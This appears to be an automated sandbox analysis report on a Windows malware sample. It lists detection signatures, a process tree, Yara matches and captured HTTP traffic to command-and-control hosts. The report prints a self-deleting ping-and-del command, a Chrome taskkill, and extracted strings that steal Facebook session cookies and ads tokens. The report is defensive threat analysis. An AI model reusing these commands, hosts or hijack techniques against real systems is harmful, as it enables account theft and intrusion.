Analysis Report h1GodtbhC8.exe

Overview

General Information

Sample Name: h1GodtbhC8.exe
Analysis ID: 327203
MD5: 3ca6df4914385efd4ba9cd239b5ed254
SHA1: b66535ff43334177a5a167b9f2b07ade75484eec
SHA256: 0acebaf80946be0cb3099233e8807aa775c8304fc3dee48d42241ff68b7ab318
Tags: exe

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Hides threads from debuggers
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
May check the online IP address of the machine
PE file has a writeable .text section
Registers a new ROOT certificate
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Antivirus or Machine Learning detection for unpacked file
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
File is packed with WinRar
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a Chrome extension
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains strange resources
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Startup

  • System is w10x64
  • h1GodtbhC8.exe (PID: 5356 cmdline: 'C:\Users\user\Desktop\h1GodtbhC8.exe' MD5: 3CA6DF4914385EFD4BA9CD239B5ED254)
    • setup.exe (PID: 2172 cmdline: 'C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe' -s MD5: 69C9BA53239D6838D05594D96A36DEA3)
      • aliens.exe (PID: 2992 cmdline: 'C:\Program Files (x86)\71eza90awf48\aliens.exe' MD5: 87698F069716708B6743A580B1D0D0CC)
        • msiexec.exe (PID: 1752 cmdline: msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi' MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
        • 1E1C360C582DF797.exe (PID: 6300 cmdline: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 0011 installp3 MD5: 87698F069716708B6743A580B1D0D0CC)
          • 1607186572092.exe (PID: 2116 cmdline: 'C:\Users\user\AppData\Roaming\1607186572092.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186572092.txt' MD5: EF6F72358CB02551CAEBE720FBC55F95)
          • 1607186588295.exe (PID: 6636 cmdline: 'C:\Users\user\AppData\Roaming\1607186588295.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186588295.txt' MD5: EF6F72358CB02551CAEBE720FBC55F95)
          • ThunderFW.exe (PID: 7040 cmdline: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' MD5: F0372FF8A6148498B19E04203DBB9E69)
        • 1E1C360C582DF797.exe (PID: 3180 cmdline: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 200 installp3 MD5: 87698F069716708B6743A580B1D0D0CC)
          • cmd.exe (PID: 2416 cmdline: cmd.exe /c taskkill /f /im chrome.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 5728 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Program Files (x86)\71eza90awf48\aliens.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 4948 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
  • msiexec.exe (PID: 772 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 57A4014B45800FBE12583F3FC91E5DB8 C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000015.00000002.831664649.00000000050E9000.00000004.00000001.sdmp | SUSP_XORed_MSDOS_Stub_Message | Detects suspicious XORed MSDOS stub message | Florian Roth
  • 0x1576d6:$xo1: /\x13\x12\x08[\x0B\x09\x14\x1C\x09\x1A\x16[\x18\x1A\x15\x15\x14\x0F[\x19\x1E[\x09\x0E\x15[\x12\x15[?4([\x16\x14\x1F\x1E
00000019.00000002.654114181.0000000004750000.00000040.00000001.sdmp | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000004.00000002.641295174.00000000046E0000.00000040.00000001.sdmp | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000015.00000002.829571542.00000000046C0000.00000040.00000001.sdmp | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n

Unpacked PEs

Source | Rule | Description | Author | Strings
21.2.1E1C360C582DF797.exe.46c0000.7.unpack | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.aliens.exe.46e0000.5.unpack | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.aliens.exe.10000000.6.unpack | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
25.2.1E1C360C582DF797.exe.4750000.5.unpack | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.aliens.exe.46e0000.5.raw.unpack | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: h1GodtbhC8.exe | Avira: detected
Antivirus detection for URL or domain
Source: http://www.sodown.xyz/index.exe | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: dream.pics | Virustotal: Detection: 9%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\Sibuia.dll | ReversingLabs: Detection: 17%
Multi AV Scanner detection for submitted file
Source: h1GodtbhC8.exe | Virustotal: Detection: 46%
Source: h1GodtbhC8.exe | Metadefender: Detection: 16%
Source: h1GodtbhC8.exe | ReversingLabs: Detection: 64%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: h1GodtbhC8.exe | Joe Sandbox ML: detected
Source: 25.2.1E1C360C582DF797.exe.4330000.4.unpack | Avira: Label: TR/Patched.Ren.Gen2
Source: 21.2.1E1C360C582DF797.exe.42a0000.6.unpack | Avira: Label: TR/Patched.Ren.Gen2
Source: 4.2.aliens.exe.42c0000.4.unpack | Avira: Label: TR/Patched.Ren.Gen2
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: z:, x:, v:, t:, r:, p:, n:, l:, j:, h:, f:, b:, y:, w:, u:, s:, q:, o:, m:, k:, i:, g:, e:, c:, a:
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_00406301 FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_6E660F62 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_6E651C23 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_0121A534 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_0123A928 FindFirstFileExA,
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_0122B820 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_00402D09 FindFirstFileA,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_0040693B DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_004066CC FindFirstFileA,FindClose,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_1001A170 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: 21_2_026DC704 PathFileExistsW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: 21_2_026E1F70 FindFirstFileW,FindClose,@_RTC_CheckStackVars@8,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: 21_2_04FA7950 PathFileExistsA,_memset,_memset,_strcpy_s,_strcat_s,FindFirstFileA,_memset,_strcpy_s,_strcat_s,_strcat_s,_strcat_s,_strcat_s,PathFileExistsA,PathRemoveFileSpecA,_memset,_strlen,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: 21_2_04FA5A90 FindFirstFileA,FindClose,

Networking:

May check the online IP address of the machine
Source: unknown | DNS query: name: iplogger.org
Source: unknown | DNS query: name: iplogger.org
Uses ping.exe to check the status of other devices and networks
Source: unknown | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: global traffic | HTTP traffic detected: GET /info/ddd HTTP/1.1 | Host: EF6DF4AF06BA6896.xyz | Accept: */*
Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: global traffic | HTTP traffic detected: POST /info/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 93 | Host: ef6df4af06ba6896.xyz
Source: global traffic | HTTP traffic detected: POST /info/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 93 | Host: ef6df4af06ba6896.xyz
Source: global traffic | HTTP traffic detected: POST /info/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: ef6df4af06ba6896.xyz
Source: global traffic | HTTP traffic detected: POST /info/e HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 677 | Host: ef6df4af06ba6896.xyz
Source: global traffic | HTTP traffic detected: POST /info/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: ef6df4af06ba6896.xyz
Source: global traffic | HTTP traffic detected: POST /info/g HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 1405 | Host: ef6df4af06ba6896.xyz
Source: global traffic | HTTP traffic detected: POST /info/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: ef6df4af06ba6896.xyz
Source: global traffic | HTTP traffic detected: GET /info/r HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Host: ef6df4af06ba6896.xyz
Source: global traffic | HTTP traffic detected: POST /info/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 93 | Host: ef6df4af06ba6896.xyz
Source: global traffic | HTTP traffic detected: POST /info/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: ef6df4af06ba6896.xyz
Source: global traffic | HTTP traffic detected: POST /info/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: ef6df4af06ba6896.xyz
Source: global traffic | HTTP traffic detected: POST /info/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: ef6df4af06ba6896.xyz
Source: global traffic | HTTP traffic detected: POST /info/du HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 125 | Host: ef6df4af06ba6896.xyz
Source: global traffic | HTTP traffic detected: GET /info/r HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Host: ef6df4af06ba6896.xyz
Source: global traffic | HTTP traffic detected: GET /info/ddd HTTP/1.1 | Host: EF6DF4AF06BA6896.xyz | Accept: */*
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | String found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | String found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe | String found in binary or memory: _time":"13245951499607797","lastpingday":"13245947458072931","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale equals www.youtube.com (Youtube)
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | String found in binary or memory: accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originreferer: https://www.messenger.com/origin: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@&#064;@&#064;https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: */*Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: */*Origin: https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | String found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | String found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | String found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe | String found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: 1E1C360C582DF797.exe, 00000019.00000003.642482203.0000000005C32000.00000004.00000001.sdmp | String found in binary or memory: http://www.youtube.com_7 equals www.youtube.com (Youtube)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/"name="fb_dtsg" value=""logout_hash":"""logout_hash":"logoutToken:""logoutToken:"https://www.facebook.com/comet/try/source=SETTINGS_MENU&nctr[_mod]=pagelet_bluebar&__user=&__a=1&__csr=&__req=14&__beoa=0&__pc=PHASED%3ADEFAULT&dpr=1&__ccg=EXCELLENT&fb_dtsg=&jazoest=for (;;);{https://m.facebook.com/logout.php?h=%s&t=%sc_user=deleted"encrypted":"https://m.facebook.com/?_rdr""name="fb_dtsg" value="logout.phpm_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6\https://m.facebook.com/logout.php%sc_user=deletedhttps://m.facebook.com/?soft=bookmarks"logoutURL":"\"logout.phphttps://m.facebook.com&source=mtouch_logout_button&persist_locale=1&button_name=logout&button_location=settings%s equals www.facebook.com (Facebook)
